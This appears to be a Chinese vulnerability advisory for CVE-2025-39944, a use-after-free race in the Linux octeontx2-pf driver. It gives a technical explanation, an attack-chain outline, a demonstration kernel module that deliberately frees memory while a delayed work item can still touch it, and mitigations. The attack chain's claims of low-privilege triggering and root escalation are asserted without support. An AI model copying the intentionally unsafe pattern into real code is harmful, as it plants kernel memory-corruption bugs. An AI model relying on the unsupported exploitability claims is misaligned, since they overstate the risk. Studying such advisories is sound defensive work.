CVE-2025-39944：Linux内核octeontx2-pf驱动释放后使用漏洞

漏洞信息

漏洞编号

CVE-2025-39944

漏洞类型

释放后使用（Use-After-Free）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（octeontx2-pf驱动）

漏洞概述

CVE-2025-39944是Linux内核octeontx2-pf驱动中的一个高危释放后使用（Use-After-Free）漏洞，CVSS评分为7.8。该漏洞位于otx2_ptp_destroy()函数中，源于cancel_delayed_work()无法保证延迟工作项synctstamp_work已完全执行完毕。当otx2_ptp结构体被释放后，正在运行的延迟工作回调函数otx2_sync_tstamp()仍然会尝试访问已释放的内存，导致释放后使用漏洞。由于synctstamp_work是周期性执行的工作项，触发该竞争条件的可能性不容忽视。该漏洞可被本地低权限用户触发，可能导致系统崩溃、内核数据损坏或权限提升。漏洞已在多个Linux内核稳定版本中通过将cancel_delayed_work()替换为cancel_delayed_work_sync()进行修复，确保延迟工作项在otx2_ptp内存释放前被完全取消。该漏洞最初通过静态分析发现，研究人员通过在QEMU中模拟OcteonTX2 PCI设备并在otx2_sync_tstamp()函数中引入人为延迟来复现和测试该问题。

技术细节

该漏洞的技术原理如下：在octeontx2-pf驱动的PTP（精确时间协议）模块中，otx2_ptp_init()分配otx2_ptp结构体并初始化一个周期性的延迟工作项synctstamp_work，该工作项的回调函数为otx2_sync_tstamp()。在设备卸载路径中，otx2_ptp_destroy()负责清理资源，但它仅调用了cancel_delayed_work()来取消延迟工作。cancel_delayed_work()仅将工作项标记为取消状态，并不会等待正在执行的工作回调函数完成。当synctstamp_work正在CPU上运行时，如果otx2_ptp_destroy()执行kfree(ptp)释放了otx2_ptp结构体，那么otx2_sync_tstamp()回调函数将继续访问已释放的内存，造成释放后使用漏洞。具体的竞争条件为：CPU 0执行otx2_remove()->otx2_ptp_destroy()->cancel_delayed_work()->kfree(ptp)，而CPU 1同时执行otx2_sync_tstamp()回调，访问ptp->xxx造成UAF。KASAN报告确认了该漏洞，错误信息为slab-use-after-free，写入操作发生在__run_timer_base中。修复方案是将cancel_delayed_work()替换为cancel_delayed_work_sync()，后者会同步等待延迟工作项完全执行完毕后再返回，从而保证内存释放的安全性。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在运行受影响Linux内核版本的系统上拥有本地低权限访问权限，且系统需配备OcteonTX2 PCI网卡设备（或在QEMU中模拟该设备）。

STEP 2

步骤2：触发竞争条件

攻击者通过热插拔或卸载OcteonTX2 PCI设备，触发otx2_remove()调用路径，启动otx2_ptp_destroy()清理流程。

STEP 3

步骤3：竞态窗口利用

在otx2_ptp_destroy()调用cancel_delayed_work()后但kfree(ptp)执行前的极短时间窗口内，如果synctstamp_work延迟工作项正在CPU上执行otx2_sync_tstamp()回调函数，将形成竞争条件。

STEP 4

步骤4：释放后使用

otx2_sync_tstamp()回调函数通过container_of宏获取ptp指针并访问其成员，但此时ptp内存已被kfree释放，导致对已释放内存的读写操作。

STEP 5

步骤5：权限提升或系统崩溃

攻击者可利用UAF漏洞实现内核代码执行、权限提升（从普通用户提升至root），或通过破坏内核数据结构导致系统崩溃（内核panic）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-39944 PoC - Use-After-Free in octeontx2-pf otx2_sync_tstamp()
// This PoC demonstrates the race condition by simulating the bug in a test environment
// Note: The actual exploitation requires access to OcteonTX2 hardware or QEMU emulation

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/workqueue.h>
#include <linux/slab.h>
#include <linux/delay.h>

// Simulated otx2_ptp structure
struct otx2_ptp {
    int dummy_data;
    struct delayed_work synctstamp_work;
    int ref_count;
};

static struct otx2_ptp *ptp;

// Simulated otx2_sync_tstamp() callback function
static void otx2_sync_tstamp(struct work_struct *work) {
    struct otx2_ptp *ptp_ptr;
    ptp_ptr = container_of(work, struct otx2_ptp, synctstamp_work);

    // Simulate processing delay to increase race condition likelihood
    msleep(100);

    // USE-AFTER-FREE: Accessing ptp_ptr after it may have been freed
    printk(KERN_INFO "Accessing ptp->dummy_data: %d\n", ptp_ptr->dummy_data);
    ptp_ptr->ref_count++;
}

// Simulated otx2_ptp_destroy() - VULNERABLE version using cancel_delayed_work()
static void otx2_ptp_destroy_vulnerable(void) {
    printk(KERN_INFO "otx2_ptp_destroy: calling cancel_delayed_work()\n");
    cancel_delayed_work(&ptp->synctstamp_work);  // Does NOT wait for completion!
    kfree(ptp);  // Frees memory while work may still be running
    printk(KERN_INFO "otx2_ptp_destroy: freed ptp\n");
}

// Simulated otx2_ptp_destroy() - FIXED version using cancel_delayed_work_sync()
static void otx2_ptp_destroy_fixed(void) {
    printk(KERN_INFO "otx2_ptp_destroy: calling cancel_delayed_work_sync()\n");
    cancel_delayed_work_sync(&ptp->synctstamp_work);  // Waits for completion
    kfree(ptp);  // Safe to free after work is fully cancelled
    printk(KERN_INFO "otx2_ptp_destroy: freed ptp safely\n");
}

// Simulated otx2_ptp_init()
static int otx2_ptp_init(void) {
    ptp = kmalloc(sizeof(struct otx2_ptp), GFP_KERNEL);
    if (!ptp)
        return -ENOMEM;
    ptp->dummy_data = 42;
    ptp->ref_count = 0;
    INIT_DELAYED_WORK(&ptp->synctstamp_work, otx2_sync_tstamp);
    // Schedule the periodic work
    schedule_delayed_work(&ptp->synctstamp_work, msecs_to_jiffies(10));
    return 0;
}

static int __init poc_init(void) {
    printk(KERN_INFO "CVE-2025-39944 PoC module loaded\n");
    otx2_ptp_init();
    // Trigger the race condition
    msleep(50);  // Let work start
    otx2_ptp_destroy_vulnerable();  // This triggers UAF
    return 0;
}

static void __exit poc_exit(void) {
    printk(KERN_INFO "CVE-2025-39944 PoC module unloaded\n");
}

module_init(poc_init);
module_exit(poc_exit);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("PoC for CVE-2025-39944 - UAF in octeontx2-pf otx2_sync_tstamp()");

影响范围

Linux Kernel < 6.6（包含octeontx2-pf驱动的版本）

Linux Kernel 6.6.x（受影响）

Linux Kernel 6.12.x（受影响）

Linux Kernel 6.16.x（受影响）

所有包含未修复octeontx2-pf驱动PTP模块的Linux内核版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果系统不使用OcteonTX2网卡，可在内核启动参数中添加modprobe.blacklist=octeontx2_pf来禁用该驱动模块；2）限制非特权用户对/sys/bus/pci/drivers/octeontx2_pf的访问权限，防止通过热插拔触发漏洞；3）如果必须使用该网卡且无法升级内核，可在otx2_ptp_destroy()函数中临时将cancel_delayed_work()修改为cancel_delayed_work_sync()并重新编译内核模块；4）启用内核的lockdep和KASAN功能以便监控和检测潜在的UAF问题。